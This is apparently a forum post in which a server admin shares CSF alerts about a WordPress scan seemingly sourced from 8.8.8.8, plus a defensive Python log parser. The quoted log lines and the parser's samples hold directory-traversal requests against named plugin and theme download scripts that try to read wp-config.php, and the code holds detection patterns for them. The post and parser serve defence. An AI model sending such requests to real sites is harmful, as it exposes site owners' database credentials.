Upon checking my notification emails today - those sent by CSF (like fail2ban) - I noticed that one exploit appears to be launched from Google DNS IP: 8.8.8.8. I have searched online and not found much on this.
Here are the offending log entries:
Time: Fri Feb 21 05:22:33 2020 +1100
IP: 8.8.8.8 (US/United States/dns.google)
Failures: 10 (accessdenied)
Interval: 86400 seconds
Blocked: Temporary Block for 86400 seconds [LF_CUSTOMTRIGGER]
Log entries:
8.8.8.8 - - [21/Feb/2020:05:19:48 +1100] "GET /wp-content/plugins/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=../../../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 967 4036
8.8.8.8 - - [21/Feb/2020:05:20:02 +1100] "GET /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 999 4036
8.8.8.8 - - [21/Feb/2020:05:20:14 +1100] "GET /wp-content/plugins/eshop-magic/download.php?file=../../../../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 942 4036
8.8.8.8 - - [21/Feb/2020:05:20:25 +1100] "GET /wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 945 4036
8.8.8.8 - - [21/Feb/2020:05:21:15 +1100] "GET /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 975 4036
8.8.8.8 - - [21/Feb/2020:05:21:28 +1100] "GET /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 952 4036
8.8.8.8 - - [21/Feb/2020:05:21:40 +1100] "GET /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 948 4036
8.8.8.8 - - [21/Feb/2020:05:21:52 +1100] "GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 947 4036
8.8.8.8 - - [21/Feb/2020:05:22:17 +1100] "GET /wp-content/themes/felis/download.php?file=../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 926 4036
8.8.8.8 - - [21/Feb/2020:05:22:28 +1100] "GET /wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 919 4036
Any ideas?
PS: My best guess at the moment is that maybe one of the external nameservers suffered DNS cache poisoning?
Update: I am still looking into this, mainly to avoid such situations in future...
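As an added illustration of how a defender would triage entries like the ones above (example code written for this page, not from the original post, from CSF or from WordPress), here is a small Python parser for Apache combined-format lines that flags three things visible in the quoted log: a directory-traversal sequence in the query string, a request that names wp-config.php, and the mis-spelled User-Agent ("Mozlila", "Bulid", "Moblie"), which a real Android Chrome build never sends. It then counts flagged requests per source IP inside a sliding window and reports any IP that reaches the same threshold CSF used here (10 hits in 86400 seconds). The sample input is the ten lines from the post plus two constructed lines from the documentation ranges 192.0.2.10 and 198.51.100.7 (one benign, one URL-encoded) to show the decode step. One caveat that applies to any log like this: the first field is whatever the web server recorded as the peer; if a reverse proxy or mod_remoteip is configured to trust a client-supplied header, that field can be chosen by the sender, so that configuration is worth checking before reasoning about an unusual source address.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Apache "combined" format; the two trailing byte counters the post's server
# appends (mod_logio %I %O) are simply left unmatched by re.match().
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Mis-spellings present in the scanner's User-Agent in the post. A genuine
# browser UA never contains them, so they are a cheap, high-confidence marker.
TYPO_UA_TOKENS = ("Mozlila", "Bulid", "Moblie")


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    """Return the list of reasons a parsed request looks like a traversal probe."""
    reasons = []
    # Decode twice so single- and double-encoded dot-dot-slash variants are seen.
    path = unquote(unquote(rec["path"]))
    query = path.partition("?")[2]
    if "../" in query or "..\\" in query:
        reasons.append("traversal-in-query")
    if "wp-config.php" in query:
        reasons.append("targets-wp-config")
    if any(tok in rec["ua"] for tok in TYPO_UA_TOKENS):
        reasons.append("typo-user-agent")
    return reasons


def aggregate(lines, threshold=10, window=timedelta(seconds=86400)):
    """Group suspicious requests by source IP; flag IPs with >= threshold hits
    inside any window of the given length (CSF's 10 in 86400 s in the post)."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits[rec["ip"]].append((rec["ts"], rec["path"], reasons))
    flagged = {}
    for ip, events in hits.items():
        events.sort()  # oldest first; tuples sort on the timestamp
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = events
                break
    return hits, flagged


# Ten lines quoted from the post, plus two constructed lines (documentation IPs).
_UA = ('"Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 '
       '(KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"')
_POST_REQUESTS = [
    ("05:19:48", "/wp-content/plugins/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=../../../wp-config.php", 967),
    ("05:20:02", "/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php", 999),
    ("05:20:14", "/wp-content/plugins/eshop-magic/download.php?file=../../../../wp-config.php", 942),
    ("05:20:25", "/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php", 945),
    ("05:21:15", "/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php", 975),
    ("05:21:28", "/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php", 952),
    ("05:21:40", "/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php", 948),
    ("05:21:52", "/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php", 947),
    ("05:22:17", "/wp-content/themes/felis/download.php?file=../wp-config.php", 926),
    ("05:22:28", "/wp-content/force-download.php?file=../wp-config.php", 919),
]
SAMPLE_LOG = [
    f'8.8.8.8 - - [21/Feb/2020:{t} +1100] "GET {p} HTTP/1.1" 403 13 "-" {_UA} {n} 4036'
    for t, p, n in _POST_REQUESTS
] + [
    # constructed: ordinary page view, should produce no hit
    '192.0.2.10 - - [21/Feb/2020:05:30:00 +1100] "GET /index.php?p=123 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/73.0" 300 5400',
    # constructed: URL-encoded traversal from a second IP, one hit but below threshold
    '198.51.100.7 - - [21/Feb/2020:06:00:00 +1100] "GET /download.php?file=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 404 0 "-" "curl/7.68.0" 210 300',
]

if __name__ == "__main__":
    hits, flagged = aggregate(SAMPLE_LOG)
    for ip, events in hits.items():
        print(f"{ip}: {len(events)} suspicious request(s){' -> FLAGGED' if ip in flagged else ''}")
        for ts, path, reasons in events:
            print(f"  {ts:%H:%M:%S} {path[:60]} {reasons}")
```

Run as a script it prints one summary per IP; 8.8.8.8 reaches the threshold on its tenth hit, 198.51.100.7 is recorded but not flagged, and the benign line never enters the table. The window logic is per-IP, so a slow scanner spread across more than a day is only caught if the threshold is lowered or the window widened.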